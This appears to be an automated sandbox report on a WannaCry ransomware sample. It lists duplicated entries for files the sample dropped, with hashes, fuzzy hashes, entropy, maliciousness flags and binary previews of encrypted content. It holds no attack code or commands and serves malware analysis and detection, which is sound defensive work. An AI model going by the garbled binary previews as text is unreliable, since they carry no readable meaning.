                                                                                      SHA-256:C7F5280E28B4B8AE0AD9E1FA55225091AE07CDD334EE20F502EB187CE85D0DA8
                                                                                      SHA-512:08C7BDB653FADAF623087346F3E09550B866B917CEC17A4C095B8CFAFBCAEEF2F5D63910E73D3C73292D13335FDAA8778E526CF0A5218F00B18199B666204491
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....w...h..^6..........qR.Y....\)3h......>M...../...."cw<.VpR...6.q.........Y...w..+X6...Dt`+.+..'G'..........2r.|Y..Bd}.+....n.z..d;.t.kbU..[,....#....$.G......%...1.O.5...Q.Ha..LG..x..y.....U..C.y...#.h.^.TO|.Q.;..H../R3v.c..u..rj..HOG..6.{.......}............^Jm^.......*3\.(.?..... .F....)..km.CW.RE..5.....*W6!..@......`....*.`..cD.2I2(....-....../.}[....<.%....:yX.. ....T.'D...W.].QN.......L..m.'.JIK......\?.V.........R....p|W...@..n.1.....t.]?....c....d.me.Sik.{..S_........1.....o../.....\.e... ....?.5......6.?t._A;e!.@.G....#.....?o...d.w....s. ......U.|.T.B..^$.B....9u.Qi..G..G...Z.h..C....TTaw......3.O............4.bx0...g.T.7_.FY#(K5#t.....M.@.....U{eC...?...i5rR .C..I.Y<....*......S..YU.#...%..+8a.i.....eHkw.....%....K....;..L.-s... .@.G.>..u..2u.......[..<..~..!....!.#.t...".........j8..o..?f..aS.......9.........S(...sn.F....Q.~.>rl)..hoT..\54....P.Q.x.......e.m....f.5{.....L.O..k.....Q.}....9X.5mU.C}.p..1q[..R:..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):38056
                                                                                      Entropy (8bit):7.994863091293873
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:M7y53I70cI4KDA/cRSbhOs/xfCIim9UDQ6ApInc0u0mDouKj:7tm0cI4KDkc0Qs/xfCIdeDQ6ApIk0m8
                                                                                      MD5:88AE7C5DFC9F8E5E0657BC8CD5FAD8D5
                                                                                      SHA1:5C9433F767CB5038323EACBBECC8DD23073DB3B3
                                                                                      SHA-256:C7F5280E28B4B8AE0AD9E1FA55225091AE07CDD334EE20F502EB187CE85D0DA8
                                                                                      SHA-512:08C7BDB653FADAF623087346F3E09550B866B917CEC17A4C095B8CFAFBCAEEF2F5D63910E73D3C73292D13335FDAA8778E526CF0A5218F00B18199B666204491
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....w...h..^6..........qR.Y....\)3h......>M...../...."cw<.VpR...6.q.........Y...w..+X6...Dt`+.+..'G'..........2r.|Y..Bd}.+....n.z..d;.t.kbU..[,....#....$.G......%...1.O.5...Q.Ha..LG..x..y.....U..C.y...#.h.^.TO|.Q.;..H../R3v.c..u..rj..HOG..6.{.......}............^Jm^.......*3\.(.?..... .F....)..km.CW.RE..5.....*W6!..@......`....*.`..cD.2I2(....-....../.}[....<.%....:yX.. ....T.'D...W.].QN.......L..m.'.JIK......\?.V.........R....p|W...@..n.1.....t.]?....c....d.me.Sik.{..S_........1.....o../.....\.e... ....?.5......6.?t._A;e!.@.G....#.....?o...d.w....s. ......U.|.T.B..^$.B....9u.Qi..G..G...Z.h..C....TTaw......3.O............4.bx0...g.T.7_.FY#(K5#t.....M.@.....U{eC...?...i5rR .C..I.Y<....*......S..YU.#...%..+8a.i.....eHkw.....%....K....;..L.-s... .@.G.>..u..2u.......[..<..~..!....!.#.t...".........j8..o..?f..aS.......9.........S(...sn.F....Q.~.>rl)..hoT..\54....P.Q.x.......e.m....f.5{.....L.O..k.....Q.}....9X.5mU.C}.p..1q[..R:..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):36888
                                                                                      Entropy (8bit):7.994886760907111
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:zlsmusmD0/+HdSrTyd+v9rM72/Vy6/cpeR5ZVg6CRnVruMIbpURB:ZsEmD0WgrTiwM72NVnBCxVSrpURB
                                                                                      MD5:A53AF601EF1CDC0BFD694C16EE8F59C7
                                                                                      SHA1:F7A0FEFE9E8CBC2C3E03D1C53684910355A4080A
                                                                                      SHA-256:22B691A633F3335D44E8A30BEC06C0400B954C24BEC99E497FACB3921FEE38D4
                                                                                      SHA-512:96CC5CECBFC23411BCF486813E0081D656E8201B652BFD748B0FF394C493E740A090562C3ADF90400F5D875CBF4CDB68C2AB5B420645D6653CE6718054073869
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......Z.....S...y..t..=.}.)^v0%.z.K.........g..K.e.,U....sa..CU1...C..XMG.oI..3=......&..:M..."..<.......M.A.....,...Xw9....At.6.....SP...O~u...SsG..%.7I.#|...$....+.O.X...m.6lq..u..u..Wy./..5..$.[.......3:cm.< .8.o[..K....<.f.....E...W.`d.]v.............._.?.Sz.....l;...9f....E.$.tO.>.....+~.[.....:......C2...U.S.)~+..e....x.u.p[.F+..w...%..y./.T....Q..0zV.c..:<..+.H.,0-m,...nr.Y..Y.'-.s..m..j.3. 2.a......&LN.."g...A.e).X!.,..H.v*.......Ja).....e..p.&.H..hF.5P.W..N..BW..O.a._:.....vbjR.z...Wj.[.D...6<...-..n......P.:s.z..;.]x..R.o.......T.o=p..s...X.V..Q.k...^s`n....G.N.i...;....>..|(.T....F...>Q...J...H=S.AtoX{c\.^Q.d..f..v?..4A..J.I..p~.P.)B.?.......@......X.L......}.'...........;@....c5..~3.......f]OC3|.d..^...!.A.D.MiP.I....uAk&.8.m....|......l{....Ow....Hl.-s.]..z:$n..6.....Nh......)..0m.zT.{<Az3....q.g..^...o[....-NZ.OJO(..Jd...T..p0z6.ww.<....)..p?.!....@88..c''..........d%.....g....k......i..c..&t,A.!.I=......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):36888
                                                                                      Entropy (8bit):7.994886760907111
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:zlsmusmD0/+HdSrTyd+v9rM72/Vy6/cpeR5ZVg6CRnVruMIbpURB:ZsEmD0WgrTiwM72NVnBCxVSrpURB
                                                                                      MD5:A53AF601EF1CDC0BFD694C16EE8F59C7
                                                                                      SHA1:F7A0FEFE9E8CBC2C3E03D1C53684910355A4080A
                                                                                      SHA-256:22B691A633F3335D44E8A30BEC06C0400B954C24BEC99E497FACB3921FEE38D4
                                                                                      SHA-512:96CC5CECBFC23411BCF486813E0081D656E8201B652BFD748B0FF394C493E740A090562C3ADF90400F5D875CBF4CDB68C2AB5B420645D6653CE6718054073869
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......Z.....S...y..t..=.}.)^v0%.z.K.........g..K.e.,U....sa..CU1...C..XMG.oI..3=......&..:M..."..<.......M.A.....,...Xw9....At.6.....SP...O~u...SsG..%.7I.#|...$....+.O.X...m.6lq..u..u..Wy./..5..$.[.......3:cm.< .8.o[..K....<.f.....E...W.`d.]v.............._.?.Sz.....l;...9f....E.$.tO.>.....+~.[.....:......C2...U.S.)~+..e....x.u.p[.F+..w...%..y./.T....Q..0zV.c..:<..+.H.,0-m,...nr.Y..Y.'-.s..m..j.3. 2.a......&LN.."g...A.e).X!.,..H.v*.......Ja).....e..p.&.H..hF.5P.W..N..BW..O.a._:.....vbjR.z...Wj.[.D...6<...-..n......P.:s.z..;.]x..R.o.......T.o=p..s...X.V..Q.k...^s`n....G.N.i...;....>..|(.T....F...>Q...J...H=S.AtoX{c\.^Q.d..f..v?..4A..J.I..p~.P.)B.?.......@......X.L......}.'...........;@....c5..~3.......f]OC3|.d..^...!.A.D.MiP.I....uAk&.8.m....|......l{....Ow....Hl.-s.]..z:$n..6.....Nh......)..0m.zT.{<Az3....q.g..^...o[....-NZ.OJO(..Jd...T..p0z6.ww.<....)..p?.!....@88..c''..........d%.....g....k......i..c..&t,A.!.I=......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.292463403236076
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEs7dmCfa+GzaFpspOOwACTzeM8LUVC1ET79gK4okhZLIVn:bkEIdda+G4ZACTzeM8t27ejBG
                                                                                      MD5:50195D4138E8FADA4AAB70F82633B448
                                                                                      SHA1:B1CADCC52A8D04F834B76169031EC59FAC291061
                                                                                      SHA-256:7C0C0B2E433072244DA71542724D853C214307BBAB4A2AE0E0274DCC8A4295EB
                                                                                      SHA-512:AC0ECA7841550756FB6118CEF7CD259A209E6A91758DD01B208369F60A31368A16EC38EF13D1F82BA3E8B1A9B3D00B736F9BBED8AE4CE8B0A6E64A030EB22471
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....L.rm..@}.nU......7.I.....j.."..J.l.^.p.x}=.?.....8G..9....2....Ha...!+60.....)..f.#&[...8.....F...-#........y.i[Ol....X;2tP.|..5...z..$.:..@^..=.pt+.U..d.[.q.Y.2.........'.m..uhB.D..^,h#.T..3'YySb`(:..]x.[.y..boS7.5I...o.....3_.a..!1..x...0b.............Sg._=...K......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.292463403236076
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEs7dmCfa+GzaFpspOOwACTzeM8LUVC1ET79gK4okhZLIVn:bkEIdda+G4ZACTzeM8t27ejBG
                                                                                      MD5:50195D4138E8FADA4AAB70F82633B448
                                                                                      SHA1:B1CADCC52A8D04F834B76169031EC59FAC291061
                                                                                      SHA-256:7C0C0B2E433072244DA71542724D853C214307BBAB4A2AE0E0274DCC8A4295EB
                                                                                      SHA-512:AC0ECA7841550756FB6118CEF7CD259A209E6A91758DD01B208369F60A31368A16EC38EF13D1F82BA3E8B1A9B3D00B736F9BBED8AE4CE8B0A6E64A030EB22471
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....L.rm..@}.nU......7.I.....j.."..J.l.^.p.x}=.?.....8G..9....2....Ha...!+60.....)..f.#&[...8.....F...-#........y.i[Ol....X;2tP.|..5...z..$.:..@^..=.pt+.U..d.[.q.Y.2.........'.m..uhB.D..^,h#.T..3'YySb`(:..]x.[.y..boS7.5I...o.....3_.a..!1..x...0b.............Sg._=...K......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.157020479038259
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE60sj7xIbYp1czVZCMYPrIZZRC9xjNWv8fpUQWuirj+iJBAVxaf20IA/oqwnu:bkE6Vj7CbemzVZAMC9GvkpUyk+iJqVxO
                                                                                      MD5:4F2AB3A155CB13A852934B66AAAAFA40
                                                                                      SHA1:057DFCAA6D033EA4BD2A59A50B933A6149F87C6D
                                                                                      SHA-256:34788B634617A912E40BE732B1F0135EDE17E077275A2C431BDEAA32E37B0311
                                                                                      SHA-512:AD4C27FC79A45D1DA2E8D5E4988109E8726BD3DBB94A0BCEFA519936AA7471E98B5B7B89B9DD83E178F01F5235A271BCD829DBCB65E2C8570B8AB5949D0E50AF
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....w......i...$q.......B....wx.8..FcN.`..!.\..W...U....*.N...L...'fZ.)h.f..I....~...]......Dz..a..p,....!..4W....>.J.....'...J;B..hh\.2F..3U.....z.W..&2.q...TA^*...XY..~..D.".....N.w.S..z.N...dm..u4..W...E....W.{$....\...@..u1. .^M1>..9....v],..&................._jo.E.6.B.(.n
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.157020479038259
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE60sj7xIbYp1czVZCMYPrIZZRC9xjNWv8fpUQWuirj+iJBAVxaf20IA/oqwnu:bkE6Vj7CbemzVZAMC9GvkpUyk+iJqVxO
                                                                                      MD5:4F2AB3A155CB13A852934B66AAAAFA40
                                                                                      SHA1:057DFCAA6D033EA4BD2A59A50B933A6149F87C6D
                                                                                      SHA-256:34788B634617A912E40BE732B1F0135EDE17E077275A2C431BDEAA32E37B0311
                                                                                      SHA-512:AD4C27FC79A45D1DA2E8D5E4988109E8726BD3DBB94A0BCEFA519936AA7471E98B5B7B89B9DD83E178F01F5235A271BCD829DBCB65E2C8570B8AB5949D0E50AF
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....w......i...$q.......B....wx.8..FcN.`..!.\..W...U....*.N...L...'fZ.)h.f..I....~...]......Dz..a..p,....!..4W....>.J.....'...J;B..hh\.2F..3U.....z.W..&2.q...TA^*...XY..~..D.".....N.w.S..z.N...dm..u4..W...E....W.{$....\...@..u1. .^M1>..9....v],..&................._jo.E.6.B.(.n
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.999826785787712
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:bRFP3MBoC/5uxnl9GbiGopgyUyryz1annpt6Ohm:bRFPcBoCcZHcYfu1an2
                                                                                      MD5:310D7047EE808372D786BE8848AD55D0
                                                                                      SHA1:93E9A85735F99FB396F13CA0850E370E1EFEC141
                                                                                      SHA-256:4153DF9A36598D720C5B6C51BB497536A2CBDC32A088F76808D06F5662E0254D
                                                                                      SHA-512:20E2748CE402634FF7C25217E304346674B9C4F2785314B14AE9F177CA0EA8D08ECD1C8084C1BEE1CAB5DE8AFE02F3FF4FEE882E425B976FFF55FA38D586AF7E
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....hD...Vf#G.z...l..f.......6%.Y.S......=KS..)`...-R..0...1+V...86 ..4.OE..TA.O.x.:h.@.S-U.w...iQ.R.X.i$+.......A.].ll. .p......w.n.1O_.....)|D.h.uv...pn...h.M...I.f....M.-.(R.j...z.r...z...]=..5Q.9.f........I".f.>............-.q......R[....a............@.`...N.7f..Mb......C.bj...K.a...1..N*..+..D......l.B....e@......@ZL...a.}1j.....Jn.h.a.....}..e..m.d../HS.w..5Heh.E.C: ..r....-n.vtbR...K..O...r.7..A..e.u.AI!..I.UC..fD. ...0.7...P.bn>#.R...CV......!.x..CB......\W'~T.".c..Ld.6k....L...........J.D.~....}uWa._.KS........r3..zbt.h.%.HD.FF.S.l...C...........$...O\..;.9._....R....?.?..2..|.+...V....0....sUF.s..R..e.P]....v....D&~$..I.|:.Hr...+71.Z0.v.....<.2..Q......_&Pv-..4..&. ...%za......~pR..=.Hz.8o(..`.&..*.p.+8jA....P..l.s....Nj0v.(.Yr.u.?\.ZG.w\.#[wI....-..gN..Y.\...<.v...`......](.m.R.<.........RAV.5.yh~....~.3.1\H..3..&..8(.?X..B`.x>.w.C..nK.,......g.o/.E|<...A:.k...o..`.u.#...H..u...S.j.H....%`s2,....(_it.M.!d..i..j.4.J..p
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.999826785787712
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:bRFP3MBoC/5uxnl9GbiGopgyUyryz1annpt6Ohm:bRFPcBoCcZHcYfu1an2
                                                                                      MD5:310D7047EE808372D786BE8848AD55D0
                                                                                      SHA1:93E9A85735F99FB396F13CA0850E370E1EFEC141
                                                                                      SHA-256:4153DF9A36598D720C5B6C51BB497536A2CBDC32A088F76808D06F5662E0254D
                                                                                      SHA-512:20E2748CE402634FF7C25217E304346674B9C4F2785314B14AE9F177CA0EA8D08ECD1C8084C1BEE1CAB5DE8AFE02F3FF4FEE882E425B976FFF55FA38D586AF7E
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....hD...Vf#G.z...l..f.......6%.Y.S......=KS..)`...-R..0...1+V...86 ..4.OE..TA.O.x.:h.@.S-U.w...iQ.R.X.i$+.......A.].ll. .p......w.n.1O_.....)|D.h.uv...pn...h.M...I.f....M.-.(R.j...z.r...z...]=..5Q.9.f........I".f.>............-.q......R[....a............@.`...N.7f..Mb......C.bj...K.a...1..N*..+..D......l.B....e@......@ZL...a.}1j.....Jn.h.a.....}..e..m.d../HS.w..5Heh.E.C: ..r....-n.vtbR...K..O...r.7..A..e.u.AI!..I.UC..fD. ...0.7...P.bn>#.R...CV......!.x..CB......\W'~T.".c..Ld.6k....L...........J.D.~....}uWa._.KS........r3..zbt.h.%.HD.FF.S.l...C...........$...O\..;.9._....R....?.?..2..|.+...V....0....sUF.s..R..e.P]....v....D&~$..I.|:.Hr...+71.Z0.v.....<.2..Q......_&Pv-..4..&. ...%za......~pR..=.Hz.8o(..`.&..*.p.+8jA....P..l.s....Nj0v.(.Yr.u.?\.ZG.w\.#[wI....-..gN..Y.\...<.v...`......](.m.R.<.........RAV.5.yh~....~.3.1\H..3..&..8(.?X..B`.x>.w.C..nK.,......g.o/.E|<...A:.k...o..`.u.#...H..u...S.j.H....%`s2,....(_it.M.!d..i..j.4.J..p
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2680
                                                                                      Entropy (8bit):7.928915228385431
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bktMBvYOnmxev00Jmc0A71S70H/E2g+JjYi4vCZbabzzvifXXKL88wq8HUegHFho:ot9imxeRh1fE3MjYisCZmbz2fXXV9Row
                                                                                      MD5:C123CE71E82208BAA2789AAB8959A13C
                                                                                      SHA1:F64FF8C4D7C04484EDFDB00114131C767370D52A
                                                                                      SHA-256:D2B2E9244DFCCFF402BBF28FFA8E4F2A42DB9CA4B99F31D3E415B1A3E27022D4
                                                                                      SHA-512:3CC0765CF1052BDC914B1EE09C9D308B9F196A024B5A5C52C12E973B6EC216D4312CD896A74344688D92C93063977030E0D6CAD43BDC39A7977E551E5B5D5FC6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......G.(KG....H?:..i.~.......`.#c...n..?ihi.Mq.RSl...,J+.?.}.;..W.7.5.=.Z....[...=...A.T...B......A...r...%.T.}.&....1(E...w>..(...$.....K.grT8.........?....$RZ]T..y.]..-....1.S.%,......Q(...x.....*.}T..U..Iu.N"..(C7R..`.>_{.[..yX..G;r..}..K.4....Y..........\...+.........."~....N..0.[.4...+.f....?..AGz,...DN.'..V@.....V....cu.....Wu.J.4..w.3.l...s%....?z...._......;...)..k.......E..301.pmV......'Y...4.N...Y.....C.Kb..i.jQU.npu..*.aX..H...f.f....v..:.B.O.+..."$.2.e.Y6..Xk..0.v...A....v.tB.)l.q.u.'..#7..l........:..t].I....a....%.A.W..9.g..Q......?.D.jQ[.........Y..f...DO..~..v7XA[TA..e.E&.V..6S...n..B...^..X..TC.......5...t....3...p.....!..:A$(m#kT...3<y.C*.L..iV.0......O.],1..c3'..4..R.....P......l.z.vD.v.......(...`S.....M.J..;....p...,.f..Q..a.B...v..s,.1b6.u.\Z....-A.../....H...^..)?.J...9Z......O*.......J........:.".Y...B........T.G.7.f...#`s...\<6...G.'.......k&f.4o}.(...._.h.....>uE....Z.?.Z\.:/..lO.pd.WU9'.x;:..l...;W%.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2680
                                                                                      Entropy (8bit):7.928915228385431
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bktMBvYOnmxev00Jmc0A71S70H/E2g+JjYi4vCZbabzzvifXXKL88wq8HUegHFho:ot9imxeRh1fE3MjYisCZmbz2fXXV9Row
                                                                                      MD5:C123CE71E82208BAA2789AAB8959A13C
                                                                                      SHA1:F64FF8C4D7C04484EDFDB00114131C767370D52A
                                                                                      SHA-256:D2B2E9244DFCCFF402BBF28FFA8E4F2A42DB9CA4B99F31D3E415B1A3E27022D4
                                                                                      SHA-512:3CC0765CF1052BDC914B1EE09C9D308B9F196A024B5A5C52C12E973B6EC216D4312CD896A74344688D92C93063977030E0D6CAD43BDC39A7977E551E5B5D5FC6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......G.(KG....H?:..i.~.......`.#c...n..?ihi.Mq.RSl...,J+.?.}.;..W.7.5.=.Z....[...=...A.T...B......A...r...%.T.}.&....1(E...w>..(...$.....K.grT8.........?....$RZ]T..y.]..-....1.S.%,......Q(...x.....*.}T..U..Iu.N"..(C7R..`.>_{.[..yX..G;r..}..K.4....Y..........\...+.........."~....N..0.[.4...+.f....?..AGz,...DN.'..V@.....V....cu.....Wu.J.4..w.3.l...s%....?z...._......;...)..k.......E..301.pmV......'Y...4.N...Y.....C.Kb..i.jQU.npu..*.aX..H...f.f....v..:.B.O.+..."$.2.e.Y6..Xk..0.v...A....v.tB.)l.q.u.'..#7..l........:..t].I....a....%.A.W..9.g..Q......?.D.jQ[.........Y..f...DO..~..v7XA[TA..e.E&.V..6S...n..B...^..X..TC.......5...t....3...p.....!..:A$(m#kT...3<y.C*.L..iV.0......O.],1..c3'..4..R.....P......l.z.vD.v.......(...`S.....M.J..;....p...,.f..Q..a.B...v..s,.1b6.u.\Z....-A.../....H...^..)?.J...9Z......O*.......J........:.".Y...B........T.G.7.f...#`s...\<6...G.'.......k&f.4o}.(...._.h.....>uE....Z.?.Z\.:/..lO.pd.WU9'.x;:..l...;W%.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1912
                                                                                      Entropy (8bit):7.911383324928724
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkmVEEfTOe6Rt5TnO73hC5aQraA+KmdGZyCTQEK:ocE0Oe6RbTOh6taVGyCUF
                                                                                      MD5:A10419836B3247BF8CFD1F2D155112A7
                                                                                      SHA1:FD624BC3E75E79F61A898C1E6DDBBBFEAE6917A1
                                                                                      SHA-256:9A2A9B6BDEA7FF49F57C8E626427A1ED10D0A5B4F8DAEDB1432ECC81A65A63F8
                                                                                      SHA-512:3B7F53A785C835519A411BA09F43B7E9A32BA30F66BD19A2FE8FDD6F41DD247BD058E340135B8A418E8640702463A53B46AAEEBAD5ABA7007467E0F482A06009
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......q.'.`.../....X.DH...Jp..9...K.)~9..-...,......C.<I.~.e.d.5..w}.%.3........-..OJK.uui\.L.....>..f...O;.p..z.?..E..j.~+."..)@p{|!.rf.V;....h[.v...?U.x......k2.[./.[.b.....x%.H{......F.1dW...nu....f5.-../..._i.;.oC]...L.....W.}y..u...$.<.........[.......zu].2.&x...wER..y.).....=t..h...ZD.....e.>..RH..F..u.h.i.(...H....{gy..@.J.T..k..-..?.Z..Z..[.S?....q..../._|..T....Ff...V'..yt..4./....s..Ay.-3...l..k~SP........M.R.<.......6.J#.. ,.E...t.....`.......jp#tc..H%7}........G...{.I.........6.M.O M..l;...."[MR......p..j:..P2...}.G...#$.f...'.iL...#...".`......i...=0..`-X..p0........butw.AD.>".2.&.....=. Z?{)..<...f.Nh.h..(=p'w.<?.N..%..O.2K...6.j....e....c<......c.{...JZ.......*..>b..v..f..{.........s.D........./.....\...E4..N...p..p..m.%....}.....(.....v&..sb.$mc.P..("h+.......{..~....\.k.9.....UlC.'.t9\.R...4...$~...0.......".......`B.^.}]&.1R....J.B.4..x.....q.....t0 ...7.....~/.-@wBxr..a......Xa@..m..YQ.^.Fk~.$.*%.x..vJ"%.":...m
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1912
                                                                                      Entropy (8bit):7.911383324928724
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkmVEEfTOe6Rt5TnO73hC5aQraA+KmdGZyCTQEK:ocE0Oe6RbTOh6taVGyCUF
                                                                                      MD5:A10419836B3247BF8CFD1F2D155112A7
                                                                                      SHA1:FD624BC3E75E79F61A898C1E6DDBBBFEAE6917A1
                                                                                      SHA-256:9A2A9B6BDEA7FF49F57C8E626427A1ED10D0A5B4F8DAEDB1432ECC81A65A63F8
                                                                                      SHA-512:3B7F53A785C835519A411BA09F43B7E9A32BA30F66BD19A2FE8FDD6F41DD247BD058E340135B8A418E8640702463A53B46AAEEBAD5ABA7007467E0F482A06009
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......q.'.`.../....X.DH...Jp..9...K.)~9..-...,......C.<I.~.e.d.5..w}.%.3........-..OJK.uui\.L.....>..f...O;.p..z.?..E..j.~+."..)@p{|!.rf.V;....h[.v...?U.x......k2.[./.[.b.....x%.H{......F.1dW...nu....f5.-../..._i.;.oC]...L.....W.}y..u...$.<.........[.......zu].2.&x...wER..y.).....=t..h...ZD.....e.>..RH..F..u.h.i.(...H....{gy..@.J.T..k..-..?.Z..Z..[.S?....q..../._|..T....Ff...V'..yt..4./....s..Ay.-3...l..k~SP........M.R.<.......6.J#.. ,.E...t.....`.......jp#tc..H%7}........G...{.I.........6.M.O M..l;...."[MR......p..j:..P2...}.G...#$.f...'.iL...#...".`......i...=0..`-X..p0........butw.AD.>".2.&.....=. Z?{)..<...f.Nh.h..(=p'w.<?.N..%..O.2K...6.j....e....c<......c.{...JZ.......*..>b..v..f..{.........s.D........./.....\...E4..N...p..p..m.%....}.....(.....v&..sb.$mc.P..("h+.......{..~....\.k.9.....UlC.'.t9\.R...4...$~...0.......".......`B.^.}]&.1R....J.B.4..x.....q.....t0 ...7.....~/.-@wBxr..a......Xa@..m..YQ.^.Fk~.$.*%.x..vJ"%.":...m
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2696
                                                                                      Entropy (8bit):7.935797557151933
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk/iQojWj8+BYskGKHgcypBxz/T8ZkfC3fr/Z6pWfzD43A+/vRvS0LTC8p:o/pSW1myHxz/TTMfF6YLcQiD
                                                                                      MD5:5048ADFEB0644508A78A1B5D63846C0B
                                                                                      SHA1:601B00734BD2E807D0F746FEFEF0B364EE9E3898
                                                                                      SHA-256:6ADDAE647F36C78F9CD9328DE1F54E008A6C7E11A6EA3DF622CB3F26B3611062
                                                                                      SHA-512:65AC0ED47730BEC7488A2FE5C7DCBB7E6798B463F923029356528E2A2818D1B0E0493B1FA4A76D5AE08A54360273CD327EDFA8A9BB74CBA8A73B4957FBB4175E
                                                                                      Malicious:false
                                                                                      Reputation:low
